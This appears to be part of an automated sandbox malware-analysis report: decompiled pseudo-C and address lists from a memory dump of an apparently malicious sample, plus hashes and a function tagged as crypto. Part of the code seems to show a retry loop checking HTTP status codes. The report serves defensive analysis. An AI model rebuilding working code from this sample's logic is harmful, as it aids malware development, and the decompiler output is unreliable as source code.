						__eflags =  *0x43b02b & 0x000000ff;
						if(( *0x43b02b & 0x000000ff) > 0) {
							_t864 = 0;
							__eflags = 0;
							_t602 = _t878 + 0x134;
							do {
								 *(_t878 + 0x128) = 0;
								_t507 = _t864 + _t864 * 2;
								_t832 =  *(0x43b02c + _t507 * 2);
								_v420 =  *(0x43b02c + _t507 * 2);
								 *((short*)(_t878 + 0x124)) =  *(0x43b030 + _t507 * 2) & 0x0000ffff;
								E00433100(_t602,  &_v420, _t874, _t602);
								_t755 =  *0x43b260; // 0x2491ee8
								_t157 = _t755 + 4; // 0x3
								E004237E0(_t755 + 4, _v404,  *_t157);
								E00420B10(_t602);
								_t864 = _t864 + 1;
								__eflags = _t864 - ( *0x43b02b & 0x000000ff);
							} while (_t864 < ( *0x43b02b & 0x000000ff));
							_t861 =  *0x43b260; // 0x2491ee8
						}
					}
					_t862 = _t861 + 4;
					E004122A0(0x3e8, _t832);
					_t600 = 0;
					_t888 = _t867 - 0xffffffff;
					if(_t867 == 0xffffffff) {
						L11:
						_t467 = _t600;
						asm("cdq");
						_t833 = _t467 %  *_t862;
						_t867 = _t467 %  *_t862;
					}
					E004331A0(_t600, _t878 + 0x224, _t862);
					 *(_t878 + 0x23c) = 1;
					 *((intOrPtr*)(_t878 + 0x264)) = 0x12c;
					if(E00433370(_t600, _t878 + 0x228, _t862, _t867, _t888, E00427600(_t862, _t867)) == 0) {
						L5:
						E00433260(_t878 + 0x224, _t833, _t867);
						_t600 = _t600 + 1;
						_t888 = _t600;
						if(_t600 != 0) {
							_t476 = _t600;
							asm("cdq");
							__eflags = _t476 %  *_t862;
							if(_t476 %  *_t862 != 0) {
								_t837 = 0xb4;
								_t478 = E0042E170(0x78, 0xb4);
							} else {
								_t837 = 0x168;
								_t478 = E0042E170(0xf0, 0x168);
							}
							__eflags = _t478 * 0x3e8;
							E004122A0(_t478 * 0x3e8, _t837);
						} else {
							E004122A0(0x3e8, _t833);
						}
						goto L11;
					}
					E00433820(_t878 + 0x22c,  &_v192, _t878 + 0x1e4);
					_t833 = _t878 + 0x204;
					_push(_t878 + 0x204);
					E00429520( &_v216);
					E00429510(_t878 + 0x204);
					__eflags =  *(_t878 + 0x224);
					if( *(_t878 + 0x224) != 0) {
						goto L5;
					}
					_t833 =  *(_t878 + 0x258);
					__eflags = _t833 - 0xc8;
					if(_t833 != 0xc8) {
						__eflags = _t833 - 0x194;
						if(_t833 != 0x194) {
							goto L5;
						}
					}
					_t838 = _a4 & 0x000000ff;
					__eflags = _a4 & 0x000000ff;
					if((_a4 & 0x000000ff) != 0) {
						_push(0);
						E00429350( &_v276);
						 *((intOrPtr*)(_t878 + 0x1cc)) = E00410B60(E00429A90( &_v216, _t867));
						__eflags = E0042A190( &_v216) -  *((intOrPtr*)(_t878 + 0x1cc));
						if(__eflags == 0) {
							E0040ABE0(_t878 + 0x13c, 2);
							E00421EB0(_t878 + 0x144, __eflags, _t878 + 0x144, 0x3b);
							E00420B10( &_v408);
							_push(E00429650(_t878 + 0x1f4));
							E00429350( &_v472);
							 *((intOrPtr*)(_t878 + 0x188)) = _v404;
							_v484 = E00426040(_v404, 0x7fffffff);
							 *((intOrPtr*)(_t878 + 0x190)) = E00429640(_t878 + 0x1f8, 0);
							 *((intOrPtr*)(_t878 + 0x18c)) = E00429650(_t878 + 0x1f4);
							_t497 = E00429640( &_v480, 0);
							_push(0);
							_push(0);
							_push(_t497);
							_push(_v340);
							_push( *((intOrPtr*)(_t878 + 0x1a0)));
							E0042E5D0(_v344,  *((intOrPtr*)(_t878 + 0x108)), _t867);
							_push(_t878 + 0xfc);
							E00429520( &_v320);
							E00429510( &_v508);
							__eflags = _a8 & 0x000000ff;
							if((_a8 & 0x000000ff) != 0) {
								E00429850(_t878 + 0x1bc,  &_v684, 0x80);
								E00429510( &_v692);
							}
							E00420B10( &_v420);
						}
						_t833 = _t878 + 0x1b4;
						_push(_t878 + 0x1b4);
						E00429520( *((intOrPtr*)(_t878 + 0x1c4)));
						E00429510( &_v312);
						_t506 = E00429660( *((intOrPtr*)(_t878 + 0x1c4)));
						__eflags = _t506;
						if(_t506 != 0) {
							goto L5;
						}
					}
					E00433260(_t878 + 0x224, _t838, _t867);
					E00429510(_t878 + 0x1f4);
					E00429510(_t878 + 0x1e4);
					 *0x43b000 = _t867;
					return _v260;
				}
				L99:
			}

0x00406ad1
0x00406ad6
0x00406ad7
0x00406ad8
0x00406ad9
0x00406adf
0x00406ae8
0x00406aec
0x00406afd
0x00406b05
0x00406b07
0x00406b0c
0x00406b12
0x00407967
0x00407969
0x0040796e
0x00407972
0x00407975
0x0040797a
0x0040798b
0x0040797c
0x0040797c
0x00407980
0x00407983
0x00407986
0x00407986
0x00407993
0x0040799e
0x004079a4
0x004079ad
0x004079b0
0x004079b0
0x004079c0
0x004079c2
0x004079c8
0x004079d1
0x004079d5
0x004079d7
0x004079d7
0x004079e2
0x004079f4
0x004079fb
0x00407a0b
0x00407a10
0x00407a16
0x00407a23
0x00407a2a
0x00407a2f
0x00407a37
0x00407a37
0x00407a3b
0x00407a40
0x00407a44
0x00407a44
0x004079c2
0x00406b23
0x00406b32
0x00406b40
0x00406b53
0x00406b56
0x00406b5c
0x00406b61
0x00406b67
0x00406b69
0x00406b6b
0x00406b70
0x00406b79
0x00406b87
0x00406b9a
0x00406ba6
0x00406bbc
0x00406bd4
0x00406be5
0x00406bfa
0x00406c06
0x00406c0b
0x00406c14
0x00406c1c
0x00406c30
0x00406c43
0x00406c4f
0x00406c5b
0x00406c67
0x00406c78
0x00406c8d
0x00406c9d
0x00406cb6
0x00406cc2
0x00406cda
0x00406cea
0x00406cf6
0x00406cfe
0x00406d05
0x00406d11
0x00406d16
0x00406d1d
0x00407241
0x0040724f
0x0040726f
0x0040727d
0x004072a6
0x004072ab
0x004072b2
0x004072b7
0x004072bb
0x004072c3
0x004072c5
0x004072ca
0x004072ce
0x004072ce
0x004072d0
0x004072d8
0x004072e5
0x004072ec
0x004072fa
0x004072ff
0x00407300
0x00407302
0x00407302
0x00407307
0x00407307
0x00407309
0x0040730d
0x00407311
0x00407315
0x00407319
0x0040731d
0x0040731d
0x00407330
0x00407341
0x0040734f
0x0040735d
0x00407362
0x0040736a
0x0040736c
0x00407370
0x00407370
0x00407372
0x0040737f
0x00407383
0x00407388
0x0040738a
0x0040739a
0x0040739c
0x0040777d
0x00407781
0x00407789
0x0040778e
0x0040779c
0x004077ae
0x004077b5
0x004077c3
0x004077d3
0x004077dc
0x004077e5
0x004077f1
0x004077f6
0x004077f8
0x00407811
0x00407815
0x0040781a
0x0040781f
0x00407821
0x00407825
0x00407827
0x00407832
0x00407832
0x00407829
0x00407829
0x0040782c
0x00000000
0x0040782e
0x0040782e
0x0040782e
0x0040782c
0x00407837
0x00407839
0x0040783c
0x0040783c
0x00407839
0x00407841
0x00000000
0x004077fa
0x00407808
0x0040780d
0x0040780f
0x0040784e
0x0040785b
0x0040786c
0x00407873
0x00407881
0x00407891
0x0040789a
0x004078a3
0x004078af
0x004078b4
0x004078b6
0x004078e3
0x004078e3
0x004078e8
0x004078f3
0x004078fe
0x00407907
0x0040790c
0x00407912
0x00407917
0x00407919
0x00407925
0x00407925
0x0040792e
0x00407933
0x00407938
0x0040793a
0x0040793e
0x00407940
0x0040794b
0x0040794b
0x00407942
0x00407942
0x00407945
0x00000000
0x00407947
0x00407947
0x00407947
0x00407945
0x00407950
0x00407952
0x00407955
0x00407955
0x00407952
0x0040795a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040780f
0x00000000
0x004077f8
0x0040739c
0x004073a2
0x004073a2
0x004073a3
0x004073a3
0x004073ac
0x004073ac
0x004073b0
0x004073b4
0x004073b8
0x00407718
0x00407723
0x0040772f
0x0040773b
0x00407744
0x00407749
0x0040774e
0x00407750
0x00407754
0x00407756
0x00407761
0x00407761
0x00407758
0x00407758
0x0040775b
0x00000000
0x0040775d
0x0040775d
0x0040775d
0x0040775b
0x00407766
0x00407768
0x0040776b
0x0040776b
0x00407768
0x00407770
0x004073be
0x004073c2
0x004073c9
0x004073d4
0x004073d9
0x004073dc
0x004073de
0x004073ee
0x00407401
0x00407406
0x00407406
0x00407417
0x00407424
0x00407430
0x0040743c
0x00407445
0x0040744a
0x0040744f
0x00407451
0x00407455
0x00407457
0x00407462
0x00407462
0x00407459
0x00407459
0x0040745c
0x00000000
0x0040745e
0x0040745e
0x0040745e
0x0040745c
0x00407467
0x00407469
0x0040746c
0x0040746c
0x00407469
0x00000000
0x0040744f
0x00407487
0x00407490
0x004074a3
0x004074b8
0x004074c4
0x004074dd
0x004074e4
0x004074ee
0x0040750b
0x00407523
0x00407544
0x0040754b
0x00407557
0x00407560
0x0040756e
0x0040757c
0x0040758a
0x0040758f
0x00407595
0x0040759c
0x004075a3
0x004075aa
0x004075bb
0x004075c0
0x004075c2
0x004075ca
0x004075ca
0x004075cc
0x004075cf
0x004075d1
0x004075d3
0x004075d6
0x004075e1
0x004075fb
0x00407607
0x00407607
0x00407618
0x0040761c
0x0040761f
0x0040761f
0x00407642
0x00407657
0x0040765e
0x0040766a
0x00407687
0x0040769f
0x004076c0
0x004076c9
0x004076d5
0x004076e1
0x004076ed
0x004076f6
0x00407702
0x0040770e
0x00000000
0x004075c4
0x004075c4
0x004075c5
0x004075c5
0x00000000
0x00407471
0x00407471
0x00407472
0x0040747a
0x0040747a
0x00407483
0x00000000
0x00406d23
0x00406d23
0x00406d2f
0x00406d45
0x00406d51
0x00406d62
0x00406d6a
0x00406d7b
0x00406d84
0x00406d91
0x00406d9f
0x00406daf
0x00406db8
0x00406db9
0x00406dba
0x00406dbb
0x00406dbc
0x00406dc1
0x00406dc5
0x00406dd1
0x00406ddf
0x00406de1
0x00406ded
0x00406e05
0x00406e13
0x00406e2f
0x00406e3b
0x00406e47
0x00406e53
0x00406e5f
0x00406e64
0x00406e6d
0x00406e72
0x00406e7b
0x00406e80
0x00406e88
0x00407177
0x0040717e
0x00407180
0x00407183
0x00407185
0x00407194
0x00407194
0x00407187
0x00407189
0x0040718c
0x0040718f
0x0040718f
0x0040719d
0x0040719f
0x004071a6
0x004071ac
0x004071af
0x004071af
0x004071bf
0x004071c1
0x004071c7
0x004071c7
0x004071c9
0x004071d0
0x004071d0
0x004071db
0x004071de
0x004071ed
0x004071f4
0x00407204
0x00407209
0x0040720f
0x0040721c
0x00407223
0x00407228
0x00407230
0x00407230
0x00407234
0x00407234
0x004071c1
0x00406e93
0x00406e96
0x00406e9b
0x00406e9d
0x00406ea0
0x00406f30
0x00406f30
0x00406f32
0x00406f33
0x00406f35
0x00406f35
0x00406ead
0x00406eb4
0x00406ebf
0x00406edf
0x00406ee1
0x00406ee8
0x00406eed
0x00406eed
0x00406eee
0x00406efc
0x00406efe
0x00406f01
0x00406f03
0x00406f1b
0x00406f20
0x00406f05
0x00406f0a
0x00406f0f
0x00406f0f
0x00406f25
0x00406f2b
0x00406ef0
0x00406ef5
0x00406ef5
0x00000000
0x00406eee
0x00406f53
0x00406f58
0x00406f5f
0x00406f67
0x00406f73
0x00406f78
0x00406f80
0x00000000
0x00000000
0x00406f86
0x00406f8d
0x00406f93
0x00406f95
0x00406f9b
0x00000000
0x00000000
0x00406f9b
0x00406fa1
0x00406fa5
0x00406fa7
0x00406fb0
0x00406fb2
0x00406fca
0x00406fdd
0x00406fe4
0x00407062
0x00407078
0x00407084
0x0040709c
0x0040709d
0x004070ae
0x004070ba
0x004070cf
0x004070e2
0x004070f2
0x004070f9
0x004070fa
0x004070fb
0x004070fc
0x00407103
0x00407118
0x00407124
0x0040712c
0x00407138
0x00407141
0x00407143
0x00407167
0x00407170
0x00407170
0x0040714c
0x0040714c
0x00406fe6
0x00406fed
0x00406ff1
0x00406ffd
0x00407009
0x0040700e
0x00407010
0x00000000
0x00000000
0x00407010
0x0040701d
0x00407029
0x00407035
0x0040703a
0x00407053
0x00407053
0x00000000

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 214d56bc9b3e23d9141ab70c43b85f5da2f305d8e45f57e8da7ee7ada8b0c1e6
Instruction ID: ba15c4d8619c5e1e3e8219f62014fe7165e13be8704a604dff3710a1b98b1895
Opcode Fuzzy Hash: 214d56bc9b3e23d9141ab70c43b85f5da2f305d8e45f57e8da7ee7ada8b0c1e6
Instruction Fuzzy Hash: 508294302183509BD334EB21D891BEFB3E5AFD4308F40492EB59A571D2EF786944CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004250A0, Relevance: .8, Instructions: 835
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E004250A0(signed int* __ecx, signed int* _a4, signed int _a8) {
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t265;
				intOrPtr* _t266;
				char* _t269;
				unsigned int _t276;
				signed int _t278;
				char* _t279;
				void* _t281;
				signed int _t282;
				intOrPtr* _t283;
				char* _t286;
				unsigned int _t293;
				signed int _t295;
				char* _t296;
				void* _t300;
				signed int _t302;
				unsigned int _t311;
				void* _t315;
				unsigned int _t321;
				signed int _t322;
				signed int _t327;
				signed int _t328;
				char _t332;
				signed int _t333;
				char _t339;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				char _t351;
				char _t354;
				signed int _t355;
				intOrPtr _t358;
				char* _t367;
				signed int _t373;
				signed int _t374;
				char* _t376;
				signed int _t382;
				signed int _t383;
				signed int _t385;
				void* _t386;
				intOrPtr _t387;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				unsigned int _t395;
				signed int _t398;
				signed int _t399;
				char _t400;
				char _t401;
				signed int _t403;
				signed int _t404;
				char _t405;
				char _t406;
				signed int _t407;
				intOrPtr _t413;
				char* _t417;
				char _t418;
				char _t419;
				signed int _t421;
				unsigned int _t427;
				signed int _t429;
				void* _t431;
				char* _t433;
				char _t434;
				char _t435;
				char* _t442;
				char _t445;
				char _t446;
				char _t447;
				signed int _t449;
				signed int _t451;
				signed int _t452;
				char* _t455;
				char _t458;
				char _t459;
				signed int _t460;
				signed int _t464;
				char _t467;
				char _t468;
				char _t469;
				signed int _t471;
				signed int _t473;
				signed int _t474;
				char* _t477;
				char _t480;
				char _t481;
				signed int _t482;
				signed int _t486;
				signed int* _t488;
				char _t493;
				signed int _t496;
				intOrPtr* _t507;
				signed int _t509;
				intOrPtr* _t510;
				unsigned int _t512;
				intOrPtr _t514;
				intOrPtr _t515;
				signed int* _t517;
				void* _t519;
				void* _t521;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				char* _t527;
				char* _t528;
				signed int* _t531;
				unsigned int _t533;
				signed int _t535;
				void* _t537;
				void* _t538;
				void* _t540;
				void* _t542;

				_t537 = (_t535 & 0xfffffff0) - 0x44;
				_t365 = __ecx;
				_t442 = _a8;
				_t517 = _a4;
				if(_t442 == 0 ||  *_t442 == 0) {
					_push(0x10);
					 *_t517 = 1;
					_t265 = E00411030();
					_push(8);
					_t517[1] = _t265;
					_t517[2] = 4;
					_t266 = E00411030();
					_t507 = _t266;
					_t538 = _t537 + 8;
					if(_t507 == 0) {
						_t507 = 0;
					} else {
						_t398 =  *_t365;
						 *_t507 = 0;
						 *(_t507 + 4) = 0;
						if(_t398 == 0 ||  *_t398 == 0) {
							_push(0x40);
							_t367 = E00411030();
							_t538 = _t538 + 4;
							_t269 =  *_t507;
							if(_t269 == 0) {
								 *_t367 = 0;
							} else {
								if(_t367 != 0) {
									_t445 =  *_t269;
									 *_t367 = _t445;
									if(_t445 != 0) {
										_t399 = 0;
										while(1) {
											_t399 = _t399 + 1;
											_t446 =  *((char*)(_t269 + _t399 * 2 - 1));
											 *((char*)(_t367 + _t399 * 2 - 1)) = _t446;
											if(_t446 == 0) {
												break;
											}
											_t447 =  *((char*)(_t269 + _t399 * 2));
											 *((char*)(_t367 + _t399 * 2)) = _t447;
											if(_t447 != 0) {
												continue;
											}
											break;
										}
										_t517 = _a4;
									}
								}
								_push(1);
								_push(_t269);
								E004110B0();
								_t538 = _t538 + 8;
							}
							 *_t507 = _t367;
							 *(_t507 + 4) = 0x40;
						} else {
							_t449 = _t398 & 0x0000000f;
							if(_t449 == 0) {
								L9:
								asm("pxor xmm0, xmm0");
								_t373 =  ~( ~_t449 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [ecx+edx]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb eax, xmm1");
									if(_t266 != 0) {
										break;
									}
									_t449 = _t449 + 0x10;
									if(_t449 < _t373) {
										continue;
									} else {
										if(_t373 >= 0x7fffffff) {
											L15:
											_t373 = 0x7fffffff;
										} else {
											while( *((char*)(_t373 + _t398)) != 0) {
												_t373 = _t373 + 1;
												if(_t373 < 0x7fffffff) {
													continue;
												} else {
													goto L15;
												}
												goto L16;
											}
										}
									}
									goto L16;
								}
								asm("bsf ebx, eax");
								_t373 = _t373 + _t449;
							} else {
								_t373 = 0;
								_t449 =  ~_t449 + 0x10;
								while( *((char*)(_t373 + _t398)) != 0) {
									_t373 = _t373 + 1;
									if(_t373 < _t449) {
										continue;
									} else {
										goto L9;
									}
									goto L16;
								}
							}
							L16:
							_t8 = _t373 + 1; // 0x80000000
							_t451 =  <=  ? 0x40 : _t8;
							if(_t451 > 0) {
								_t276 = (_t451 >> 5 >> 0x1a) + _t451 >> 6;
								_v76 = _t276;
								_t452 = _t451 & 0x8000003f;
								if(_t452 < 0) {
									_t452 = (_t452 - 0x00000001 | 0xffffffc0) + 1;
								}
								_t278 = _t276 + (0 | _t452 > 0x00000000) << 6;
								_v76 = _t278;
								_push(_t278);
								_v80 = _t398;
								_t279 = E00411030();
								_t398 = _v80;
								_t538 = _t538 + 4;
								_t455 =  *_t507;
								_v72 = _t455;
								if(_t455 == 0) {
									 *_t279 = 0;
								} else {
									if(_t279 != 0) {
										_t459 =  *_t455;
										 *_t279 = _t459;
										if(_t459 != 0) {
											_v84 = _t373;
											_t460 = 0;
											_v80 = _t398;
											_t374 = _v72;
											while(1) {
												_t460 = _t460 + 1;
												_t400 =  *((char*)(_t374 + _t460 * 2 - 1));
												 *((char*)(_t279 + _t460 * 2 - 1)) = _t400;
												if(_t400 == 0) {
													break;
												}
												_t401 =  *((char*)(_t374 + _t460 * 2));
												 *((char*)(_t279 + _t460 * 2)) = _t401;
												if(_t401 != 0) {
													continue;
												}
												break;
											}
											_t373 = _v84;
											_t398 = _v80;
											_t517 = _a4;
										}
									}
									_push(1);
									_push(_v72);
									_v84 = _t279;
									_v80 = _t398;
									E004110B0();
									_t398 = _v80;
									_t279 = _v84;
									_t538 = _t538 + 8;
								}
								 *(_t507 + 4) = _v76;
								 *_t507 = _t279;
							} else {
								_t279 = 0;
							}
							if(_t279 != 0) {
								_t519 = 0;
								while(1) {
									_t458 =  *_t398;
									_t519 = _t519 + 1;
									 *_t279 = _t458;
									if(_t373 != 0 && _t519 == _t373) {
										break;
									}
									if(_t458 == 0) {
										_t517 = _a4;
									} else {
										_t279 = _t279 + 1;
										_t398 = _t398 + 1;
										continue;
									}
									goto L48;
								}
								_t517 = _a4;
								 *((char*)(_t279 + 1)) = 0;
							}
						}
					}
					L48:
					 *(_t517[1]) = _t507;
					return _t517;
				} else {
					_t509 =  *__ecx;
					_t281 = E00425A90(_t509, _t442);
					_t464 = _a8;
					if(_t281 == 0) {
						_push(0x10);
						 *_t517 = 1;
						_t282 = E00411030();
						_push(8);
						_t517[1] = _t282;
						_t517[2] = 4;
						_t283 = E00411030();
						_t510 = _t283;
						_t540 = _t537 + 8;
						if(_t510 == 0) {
							_t510 = 0;
						} else {
							_t403 =  *__ecx;
							 *_t510 = 0;
							 *(_t510 + 4) = 0;
							if(_t403 == 0 ||  *_t403 == 0) {
								_push(0x40);
								_t376 = E00411030();
								_t540 = _t540 + 4;
								_t286 =  *_t510;
								if(_t286 == 0) {
									 *_t376 = 0;
								} else {
									if(_t376 != 0) {
										_t467 =  *_t286;
										 *_t376 = _t467;
										if(_t467 != 0) {
											_t404 = 0;
											while(1) {
												_t404 = _t404 + 1;
												_t468 =  *((char*)(_t286 + _t404 * 2 - 1));
												 *((char*)(_t376 + _t404 * 2 - 1)) = _t468;
												if(_t468 == 0) {
													break;
												}
												_t469 =  *((char*)(_t286 + _t404 * 2));
												 *((char*)(_t376 + _t404 * 2)) = _t469;
												if(_t469 != 0) {
													continue;
												}
												break;
											}
											_t517 = _a4;
										}
									}
									_push(1);
									_push(_t286);
									E004110B0();
									_t540 = _t540 + 8;
								}
								 *_t510 = _t376;
								 *(_t510 + 4) = 0x40;
							} else {
								_t471 = _t403 & 0x0000000f;
								if(_t471 == 0) {
									L157:
									asm("pxor xmm0, xmm0");
									_t382 =  ~( ~_t471 + 0x0000000f & 0x0000000f) + 0x7fffffff;
									while(1) {
										asm("movdqu xmm1, [ecx+edx]");
										asm("pcmpeqb xmm1, xmm0");
										asm("pmovmskb eax, xmm1");
										if(_t283 != 0) {
											break;
										}
										_t471 = _t471 + 0x10;
										if(_t471 < _t382) {
											continue;
										} else {
											if(_t382 >= 0x7fffffff) {
												L163:
												_t382 = 0x7fffffff;
											} else {
												while( *((char*)(_t382 + _t403)) != 0) {
													_t382 = _t382 + 1;
													if(_t382 < 0x7fffffff) {
														continue;
													} else {
														goto L163;
													}
													goto L164;
												}
											}
										}
										goto L164;
									}
									asm("bsf ebx, eax");
									_t382 = _t382 + _t471;
								} else {
									_t382 = 0;
									_t471 =  ~_t471 + 0x10;
									while( *((char*)(_t382 + _t403)) != 0) {
										_t382 = _t382 + 1;
										if(_t382 < _t471) {
											continue;
										} else {
											goto L157;
										}
										goto L164;
									}
								}
								L164:
								_t220 = _t382 + 1; // 0x80000000
								_t473 =  <=  ? 0x40 : _t220;
								if(_t473 > 0) {
									_t293 = (_t473 >> 5 >> 0x1a) + _t473 >> 6;
									_v76 = _t293;
									_t474 = _t473 & 0x8000003f;
									if(_t474 < 0) {
										_t474 = (_t474 - 0x00000001 | 0xffffffc0) + 1;
									}
									_t295 = _t293 + (0 | _t474 > 0x00000000) << 6;
									_v76 = _t295;
									_push(_t295);
									_v80 = _t403;
									_t296 = E00411030();
									_t403 = _v80;
									_t540 = _t540 + 4;
									_t477 =  *_t510;
									_v72 = _t477;
									if(_t477 == 0) {
										 *_t296 = 0;
									} else {
										if(_t296 != 0) {
											_t481 =  *_t477;
											 *_t296 = _t481;
											if(_t481 != 0) {
												_v84 = _t382;
												_t482 = 0;
												_v80 = _t403;
												_t383 = _v72;
												while(1) {
													_t482 = _t482 + 1;
													_t405 =  *((char*)(_t383 + _t482 * 2 - 1));
													 *((char*)(_t296 + _t482 * 2 - 1)) = _t405;
													if(_t405 == 0) {
														break;
													}
													_t406 =  *((char*)(_t383 + _t482 * 2));
													 *((char*)(_t296 + _t482 * 2)) = _t406;
													if(_t406 != 0) {
														continue;
													}
													break;
												}
												_t382 = _v84;
												_t403 = _v80;
												_t517 = _a4;
											}
										}
										_push(1);
										_push(_v72);
										_v84 = _t296;
										_v80 = _t403;
										E004110B0();
										_t403 = _v80;
										_t296 = _v84;
										_t540 = _t540 + 8;
									}
									 *(_t510 + 4) = _v76;
									 *_t510 = _t296;
								} else {
									_t296 = 0;
								}
								if(_t296 != 0) {
									_t521 = 0;
									while(1) {
										_t480 =  *_t403;
										_t521 = _t521 + 1;
										 *_t296 = _t480;
										if(_t382 != 0 && _t521 == _t382) {
											break;
										}
										if(_t480 == 0) {
											_t517 = _a4;
										} else {
											_t296 = _t296 + 1;
											_t403 = _t403 + 1;
											continue;
										}
										goto L196;
									}
									_t517 = _a4;
									 *((char*)(_t296 + 1)) = 0;
								}
							}
						}
						L196:
						 *(_t517[1]) = _t510;
						return _t517;
					} else {
						_t407 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_t385 = _t464 & 0x0000000f;
						if(_t385 == 0) {
							L54:
							asm("pxor xmm0, xmm0");
							_t413 =  ~( ~_t385 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [edx+ebx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb esi, xmm1");
								if(_t517 != 0) {
									break;
								}
								_t385 = _t385 + 0x10;
								if(_t385 < _t413) {
									continue;
								} else {
									if(_t413 >= 0x7fffffff) {
										L60:
										_t413 = 0x7fffffff;
									} else {
										while( *((char*)(_t413 + _t464)) != 0) {
											_t413 = _t413 + 1;
											if(_t413 < 0x7fffffff) {
												continue;
											} else {
												goto L60;
											}
											goto L61;
										}
									}
								}
								goto L61;
							}
							asm("bsf ecx, ecx");
							_t413 = _t517 + _t385;
						} else {
							_t385 =  ~_t385 + 0x10;
							while( *((char*)(_t407 + _t464)) != 0) {
								_t407 = _t407 + 1;
								if(_t407 < _t385) {
									continue;
								} else {
									goto L54;
								}
								goto L61;
							}
							asm("pxor xmm0, xmm0");
						}
						L61:
						_v28 = _t413;
						_t386 = _t281;
						do {
							_t387 = _t386 - _t509;
							if(_t387 == 0 || _t509 == 0 ||  *_t509 == 0) {
								_push(0x40);
								_t523 = E00411030();
								_t537 = _t537 + 4;
								 *_t523 = 0;
							} else {
								_t58 = _t387 + 1; // 0x1
								_t525 =  <=  ? 0x40 : _t58;
								if(_t525 > 0) {
									_t311 = (_t525 >> 5 >> 0x1a) + _t525 >> 6;
									_t526 = _t525 & 0x8000003f;
									if(_t526 < 0) {
										_t526 = (_t526 - 0x00000001 | 0xffffffc0) + 1;
									}
									_push(_t311 + (0 | _t526 > 0x00000000) << 6);
									_t523 = E00411030();
									_t537 = _t537 + 4;
									 *_t523 = 0;
									if(_t509 != 0) {
										_t315 = 0;
										while(1) {
											_t315 = _t315 + 1;
											_t493 =  *((char*)(_t315 + _t509 - 1));
											 *((char*)(_t315 + _t523 - 1)) = _t493;
											if(_t315 == _t387) {
												break;
											}
											if(_t493 != 0) {
												continue;
											} else {
											}
											goto L75;
										}
										 *((char*)(_t315 + _t523)) = 0;
									}
								} else {
									_t523 = 0;
								}
							}
							L75:
							_t486 = _v56;
							_t300 =  >  ? _t486 : 0;
							_t301 =  >=  ? _t486 : _t300;
							_v24 =  >=  ? _t486 : _t300;
							_t302 = _v48;
							if(_t486 == _t302) {
								_v48 = _t302 + 4;
								_push(0x10 + _t302 * 4);
								_v60 = E00411030();
								E00410C10(_v60, _v52, _v56 << 2);
								_push(4);
								_push(_v52);
								E004110B0();
								_t537 = _t537 + 0x18;
								_v52 = _v60;
								_t486 = _v56;
							}
							_t487 = _t486 != _v24;
							if(_t486 != _v24) {
								E00410BC0(_v52 + _v24 * 4 + 4, _v52 + _v24 * 4, _t487 << 2);
								_t537 = _t537 + 0xc;
							}
							_push(8);
							_t488 = E00411030();
							_t542 = _t537 + 4;
							if(_t488 == 0) {
								_t488 = 0;
							} else {
								 *_t488 = 0;
								_t488[1] = 0;
								if(_t523 == 0 ||  *_t523 == 0) {
									_push(0x40);
									_v64 = _t488;
									_t327 = E00411030();
									_t488 = _v64;
									_v76 = _t327;
									_t542 = _t542 + 4;
									_t328 =  *_t488;
									_v80 = _t328;
									if(_t328 == 0) {
										 *_v76 = 0;
									} else {
										if(_v76 != 0) {
											_t417 = _v76;
											_t332 =  *_t328;
											 *_t417 = _t332;
											if(_t332 != 0) {
												_v84 = _t523;
												_t333 = 0;
												_v40 = _t387;
												_v44 = _t509;
												_t393 = _v80;
												_t527 = _t417;
												while(1) {
													_t333 = _t333 + 1;
													_t418 =  *((char*)(_t393 + _t333 * 2 - 1));
													 *((char*)(_t527 + _t333 * 2 - 1)) = _t418;
													if(_t418 == 0) {
														break;
													}
													_t419 =  *((char*)(_t393 + _t333 * 2));
													 *((char*)(_t527 + _t333 * 2)) = _t419;
													if(_t419 != 0) {
														continue;
													}
													break;
												}
												_t523 = _v84;
												_t387 = _v40;
												_t509 = _v44;
											}
										}
										_push(1);
										_push(_v80);
										_v64 = _t488;
										E004110B0();
										_t488 = _v64;
										_t542 = _t542 + 8;
									}
									 *_t488 = _v76;
									_t488[1] = 0x40;
								} else {
									_t421 = _t523 & 0x0000000f;
									if(_t421 == 0) {
										L86:
										asm("pxor xmm1, xmm1");
										_t339 =  ~( ~_t421 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										_v36 = _t339;
										_v44 = _t509;
										_t514 = _t339;
										while(1) {
											asm("movdqu xmm0, [esi+ecx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb eax, xmm0");
											if(_t339 != 0) {
												break;
											}
											_t421 = _t421 + 0x10;
											if(_t421 < _t514) {
												continue;
											} else {
												_v36 = _t514;
												_t509 = _v44;
												if(_v36 >= 0x7fffffff) {
													L93:
													_v36 = 0x7fffffff;
												} else {
													_t358 = _v36;
													while( *((char*)(_t358 + _t523)) != 0) {
														_t358 = _t358 + 1;
														if(_t358 < 0x7fffffff) {
															continue;
														} else {
															goto L93;
														}
														goto L94;
													}
													goto L145;
												}
											}
											goto L94;
										}
										asm("bsf eax, eax");
										_t509 = _v44;
										_v36 = _t339 + _t421;
									} else {
										_v36 = 0;
										_t358 = _v36;
										_t421 =  ~_t421 + 0x10;
										while( *((char*)(_t358 + _t523)) != 0) {
											_t358 = _t358 + 1;
											if(_t358 < _t421) {
												continue;
											} else {
												goto L86;
											}
											goto L94;
										}
										L145:
										_v36 = _t358;
									}
									L94:
									_t343 =  <=  ? 0x40 : _v36 + 1;
